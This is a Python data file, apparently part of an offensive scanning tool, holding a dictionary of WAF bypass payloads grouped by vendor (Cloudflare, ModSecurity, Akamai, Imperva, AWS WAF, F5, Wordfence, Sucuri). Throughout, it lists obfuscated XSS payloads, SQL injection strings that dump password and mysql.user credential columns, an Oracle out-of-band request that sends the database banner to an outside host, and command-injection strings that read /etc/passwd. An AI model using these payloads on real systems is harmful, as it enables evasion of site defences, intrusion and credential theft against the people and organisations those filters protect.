"""
WAF Bypass Payloads — Per-WAF bypass techniques organized by vulnerability type.

Structured as WAF_BYPASS_DB[waf_name][vuln_type] = list of bypass payloads.
Used by PayloadEngine and WAFEvasionEngine.
"""

WAF_BYPASS_DB = {
    'cloudflare': {
        'xss': [
            '<Details/Open/OnToggle=confirm()>',
            '<svg/OnLoad=\\u0061lert(1)>',
            '<img src=x onerror=\\u0061lert(1)>',
            '<input onfocus=alert(1) autofocus>',
            '<body onload=alert(1)>',
            '<marquee onstart=alert(1)>',
            '<video><source onerror=alert(1)>',
            '<details open ontoggle=alert(1)>',
            '<math><mtext></mtext><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src>">',
            '<svg><animate onbegin=alert(1) attributeName=x dur=1s>',
            '"><img src=x onerror=alert`1`>',
            '<svg/onload=alert(String.fromCharCode(88,83,83))>',
            '<img src=x onerror="&#97;lert(1)">',
            '<a href="javascript:alert(1)">click</a>',
            '<iframe srcdoc="<script>alert(1)</script>">',
            '"><svg/onload=confirm(1)//',
            '<svg><script>alert&#40;1&#41;</script>',
            '<img/src=`x`onerror=alert(1)>',
            '<isindex action=javascript:alert(1) type=image>',
            '<object data="data:text/html,<script>alert(1)</script>">',
        ],
        'sqli': [
            "' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--",
            "' %55nion %53elect 1,2,3--",
            "' un/**/ion se/**/lect 1,2,3--",
            "' /*!UNION*/ /*!SELECT*/ 1,2,3--",
            "' UniOn SeLeCt 1,2,3--",
            "1' /*!50000%55nion*/ /*!50000%53elect*/ 1,2,3--",
            "' AND 1=1 /*!50000UNION*/ /*!SELECT*/ password FROM users--",
            "' || 1=1--",
            "'-IF(1=1,SLEEP(5),0)--",
            "1;SELECT * FROM information_schema.tables--",
            "' /*!32302 AND*/ 1=1--",
            "' UNION%23%0ASELECT 1,2,3--",
            "' UNION%0D%0ASELECT 1,2,3--",
            "' UNION ALL%23%0ASELECT 1,2,3--",
            "' /*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/ 1,2,3--",
            "1'||utl_http.request('http://x/'||(SELECT banner FROM v$version WHERE rownum=1))||'",
            '1\' /*!50000or*/ 1=1#',
            "0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z",
            "admin'--",
            "' OR '1'='1",
        ],
        'cmdi': [
            ';${IFS}cat${IFS}/etc/passwd',
            '|cat${IFS}/etc/passwd',
            '`cat /etc/passwd`',
            "$(cat${IFS}/etc/passwd)",
            '& cat /etc/passwd &',
            '| {cat,/etc/passwd}',
            ';cat$IFS/etc$IFS/passwd',
        ],
    },
    'modsecurity': {
        'xss': [
            '<svg/onload=alert(1)>',
            '<img src=x onerror=prompt(1)>',
            '"><svg onload=alert(1)//',
            '<body/onload=alert(1)>',
            '<input/onfocus=alert(1) autofocus>',
            '<details/open/ontoggle=alert(1)>',
            '<math><mi><table><mglyph><svg><mtext><textarea><mi><svg/onload=alert(1)>',
            '<svg><animate href=#x attributeName=href values=javascript:alert(1) /><a id=x>',
            '<a href="&#106;avascript:alert(1)">click</a>',
            '%3Csvg/onload=alert(1)%3E',
        ],
        'sqli': [
            "' /*!UNION*/ SELECT 1,2,3--",
            "' UNION/**/SELECT 1,2,3--",
            "' UniOn SelEcT 1,2,3--",
            "' un%69on sel%65ct 1,2,3--",
            "' %55NION %53ELECT 1,2,3--",
            "' union%23%0aselect 1,2,3--",
            "'||1=1--",
            "1' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
            "admin'/*",
            "' OR '1'='1' /*",
        ],
        'cmdi': [
            '${IFS}cat${IFS}/etc/passwd',
            '$(cat</etc/passwd)',
            ';{cat,/etc/passwd}',
            "'|cat /etc/passwd'",
            '`cat${IFS}/etc/passwd`',
        ],
    },
    'akamai': {
        'xss': [
            '<svg/onload=alert(1)>',
            '<img src=1 onerror=alert`1`>',
            '"><img src=x onerror=prompt(1)>',
            '<iMg SrC=x OnErRoR=alert(1)>',
            '<details open ontoggle=alert(1)>',
            '<math><mtext><table><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">',
        ],
        'sqli': [
            "' un/**/ion se/**/lect 1,2,3--",
            "' /*!UNION*/ /*!SELECT*/ 1,2,3--",
            "'/**/OR/**/1=1--",
            "' UNION%0ASELECT 1,2,3--",
            "' and 1=0 union select null,concat(user,char(58),authentication_string) from mysql.user--",
        ],
    },
    'imperva': {
        'xss': [
            '<svg/onload=alert(1)>',
            '<img src=x onerror=alert(1)>',
            '<body onpageshow=alert(1)>',
            '<input onfocus=alert(1) autofocus>',
            '<a href="data:text/html,<script>alert(1)</script>">x</a>',
            '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">',
        ],
        'sqli': [
            "' UNI/**/ON SEL/**/ECT 1,2,3--",
            "1' /*!50000UNION*/ /*!SELECT*/ 1,2,3--",
            "' OR 1=1--",
            "admin' --",
            "'||DBMS_PIPE.RECEIVE_MESSAGE('a',5)--",
        ],
    },
    'aws_waf': {
        'xss': [
            '<sVg/oNloAd=alert(1)>',
            '<img/src=x onerror=alert`1`>',
            '<details/open/ontoggle=confirm`1`>',
            '"><svg/onload=alert(1)//',
            '<math><mtext><table><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">',
        ],
        'sqli': [
            "' /*!50000UNION*/ SELECT 1,2,3--",
            "' UNION%23%0ASELECT 1,2,3--",
            "'%20OR%201=1--",
            "' or 1=1 limit 1--",
            "'-IF(1=1,SLEEP(5),0)--",
        ],
    },
    'f5': {
        'xss': [
            '<svg/onload=alert(1)>',
            '<img src=x onerror=\\x61lert(1)>',
            '<marquee onstart=alert(1)>',
            '<input autofocus onfocus=alert(1)>',
            '<video><source onerror=alert(1)>',
        ],
        'sqli': [
            "' union/**/select 1,2,3--",
            "'%20OR%201=1--",
            "' /*!UNION*/ /*!SELECT*/ 1,2,3--",
            "' AND 1=2 UNION SELECT 1,2,3--",
            "'-1 OR 1=1--",
        ],
    },
    'wordfence': {
        'xss': [
            '<svg onload=alert(1)>',
            '<img src=x onerror=alert(1)>',
            '"><img/src=x onerror=alert`1`>',
            '<details open ontoggle=alert(1)>',
            '<body onresize=alert(1)>',
        ],
        'sqli': [
            "' or 1=1#",
            "' UNION/**_**/SELECT 1,2,3--",
            "admin'--",
            "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
        ],
    },
    'sucuri': {
        'xss': [
            '<svg/onload=alert(1)>',
            '<img src=1 onerror=alert(1)>',
            '<input onfocus=alert(1) autofocus>',
            '<body onload=alert(1)>',
            '<marquee onstart=confirm(1)>',
        ],
        'sqli': [
            "' UNION SELECT 1,2,3--",
            "'/**/OR/**/1=1--",
            "admin'/*",
            "1' OR '1'='1",
        ],
    },
}
